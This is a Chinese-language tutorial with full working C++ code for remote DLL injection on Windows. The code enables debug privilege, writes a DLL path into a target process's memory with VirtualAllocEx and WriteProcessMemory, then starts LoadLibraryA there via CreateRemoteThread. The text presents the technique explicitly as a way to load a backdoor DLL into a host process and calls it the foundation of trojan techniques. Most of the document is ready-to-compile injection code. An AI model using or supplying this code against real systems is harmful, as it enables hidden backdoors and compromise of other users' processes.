DLL远程注入实例

一般情况下，每个进程都有自己的私有空间，理论上，别的进程是不允许对这个私人空间进行操作的，但是，我们可以利用一些方法进入这个空间并进行操作，将自己的代码写入正在运行的进程中，于是就有了远程注入了。 
对dll后门的编写就不作过多的讨论了，现在来看实现注入功能的可执行文件的编写： 
用到的函数有：

OpenProcessToken()；
LookupPrivilegeValue()；
AdjustTokenPrivileges()；
OpenProcess()；
VirtualAllocEx()；
WriteProcessMemory()；
GetProcAddress()；
CreateRemoteThread()； 

先简单的介绍以下这些函数的作用，因为我们要操作的是系统中的其他进程，如果没有足够的系统权限，我们是无法写入甚至连读取其它进程的内存地址的，所以我们就需要提升自己的权限，用到以下3个函数

OpenProcessToken()；       //打开进程令牌
LookupPrivilegeValue()；   //返回一个本地系统独一无二的ID，用于系统权限更改
AdjustTokenPrivileges()；  //从英文意思也能看出它是更改进程权限用的吧？ 

进入宿主进程的内存空间 
在拥有了进入宿主进程空间的权限之后，我们就需要在其内存加入让它加载我们后门的代码了，用 LoadLibraryA()函数就可以加载我们的DLL了，它只需要DLL文件的路径就可以了，在这里我们要把DLL文件的路径写入到宿主的内存空间里，因为DLL的文件路径并不存在于宿主进程内存空间了，用到的函数有：

OpenProcess()；         //用于修改宿主进程的一些属性，详细参看MSDN
VirtualAllocEx()；      //用于在宿主内存空间中申请内存空间以写入DLL的文件名
WriteProcessMemory();  //往申请到的空间中写入DLL的文件名 

在宿主中启动新的线程 
用的是LoadLibraryA()函数来加载，但在使用LoadLibraryA()之前必须知道它的入口地址，所以用GetProcAdress来获得它的入口地址，有了它的地址以后，就可以用CreateRemoteThread()函数来启动新的线程了，到次，整个注入过程完成，不过还不非常完善，这就留给聪明的你来完成了；）。

简单的例子：

#include <windows.h>
#include <iostream.h>

int EnableDebugPriv(const char * name)
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tp;
    LUID luid;
    //打开进程令牌环
    OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &hToken);
    //获得进程本地唯一ID
    LookupPrivilegeValue(NULL, name, &luid) ;

    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    tp.Privileges[0].Luid = luid;
    //调整权限
    AdjustTokenPrivileges(hToken, 0, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
    return 0;
}

//*****************************************************************************************************************************

BOOL InjectDll(const char *DllFullPath, const DWORD dwRemoteProcessId)
{
    HANDLE hRemoteProcess;
    EnableDebugPriv(SE_DEBUG_NAME);
    //打开远程线程
    hRemoteProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, dwRemoteProcessId );

    char *pszLibFileRemote;

    //使用VirtualAllocEx函数在远程进程的内存地址空间分配DLL文件名空间
    pszLibFileRemote = (char *) VirtualAllocEx( hRemoteProcess, NULL, lstrlen(DllFullPath)+1, MEM_COMMIT, PAGE_READWRITE);

    //使用WriteProcessMemory函数将DLL的路径名写入到远程进程的内存空间
    WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (void *) DllFullPath, lstrlen(DllFullPath)+1, NULL);

//##############################################################################
    //计算LoadLibraryA的入口地址
    PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
            GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA");
    //(关于GetModuleHandle函数和GetProcAddress函数)

    //启动远程线程LoadLibraryA，通过远程线程调用创建新的线程
    HANDLE hRemoteThread;
    if( (hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL) ) == NULL)
    {
        cout<<"注入线程失败!"<<endl;
        return FALSE;
    }
//##############################################################################

    /*
    // 在//###.....//###里的语句也可以用如下的语句代替:
     DWORD dwID;
     LPVOID pFunc = LoadLibraryA;
     HANDLE hRemoteThread = CreateRemoteThread(hRemoteProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFunc, pszLibFileRemote, 0, &dwID );
     //是不是感觉简单了很多
    */

      // 释放句柄

    CloseHandle(hRemoteProcess);
    CloseHandle(hRemoteThread);

    return TRUE;
}

//*****************************************************************************************************************************

int main()
{
    InjectDll("c:\\zrqfzr.dll", 3060) ;//这个数字是你想注入的进程的ID号
    return 0;
}

在NT系列操作系统中，EnableDebugPriv函数实现的部分可以去掉的。要研究木马这个技术可是基础。